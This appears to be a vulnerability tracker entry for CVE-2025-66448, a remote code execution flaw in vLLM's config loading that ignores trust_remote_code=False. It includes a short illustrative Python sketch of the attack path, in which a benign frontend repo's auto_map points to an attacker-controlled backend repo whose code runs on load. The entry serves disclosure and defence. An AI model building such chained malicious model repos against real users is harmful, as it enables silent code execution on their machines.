vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vLLM has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vLLM loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend's code on the victim host. This vulnerability is fixed in 0.11.1.
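For illustration only, here is a minimal sketch of the attack path described above. The repo names ("innocuous/frontend-model", "attacker/backend-code") and the function vulnerable_auto_map_load are invented for this sketch and paraphrase the vulnerable pattern; they are not vLLM's actual code. Only get_class_from_dynamic_module is the real Transformers helper named in the advisory.

# Hypothetical sketch of the attack path; repo names are invented and
# vulnerable_auto_map_load paraphrases the pattern, not vLLM's code.
#
# The benign-looking frontend repo's config.json would carry an auto_map
# entry pointing at a second, attacker-controlled repo, e.g.:
#   "auto_map": {"AutoConfig": "attacker/backend-code--configuration_x.XConfig"}

from transformers.dynamic_module_utils import get_class_from_dynamic_module

def vulnerable_auto_map_load(auto_map_ref: str, frontend_repo: str):
    # get_class_from_dynamic_module downloads the .py file from the repo
    # named *inside* auto_map_ref and imports it; attacker code already
    # runs at import time, and nothing here consults trust_remote_code.
    cls = get_class_from_dynamic_module(auto_map_ref, frontend_repo)
    # Instantiating the returned class executes further attacker-controlled code.
    return cls()

# Loading the frontend repo is enough to trigger the backend's code:
# vulnerable_auto_map_load(
#     "attacker/backend-code--configuration_x.XConfig",
#     "innocuous/frontend-model",
# )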
Advisories

No advisories yet.

Fixes

Solution

No solution given by the vendor.


Workaround

No workaround given by the vendor.

History

Tue, 02 Dec 2025 12:30:00 +0000

Type: First Time appeared
Values Added: Vllm-project, Vllm-project vllm

Type: Vendors & Products
Values Added: Vllm-project, Vllm-project vllm

Mon, 01 Dec 2025 23:00:00 +0000

Type: Description
Values Added: (the vulnerability description shown at the top of this page)

Type: Title
Values Added: vLLM vulnerable to remote code execution via transformers_utils/get_config

Type: Weaknesses
Values Added: CWE-94

Type: References
Values Added: (none listed)

Type: Metrics
Values Added: cvssV3_1: 7.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H)


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2025-12-02T14:14:58.324Z

Reserved: 2025-12-01T18:22:06.865Z

Link: CVE-2025-66448

Vulnrichment

No data.

NVD

Status: Received

Published: 2025-12-01T23:15:54.213

Modified: 2025-12-01T23:15:54.213

Link: CVE-2025-66448

Redhat

No data.

OpenCVE Enrichment

Updated: 2025-12-02T11:58:51Z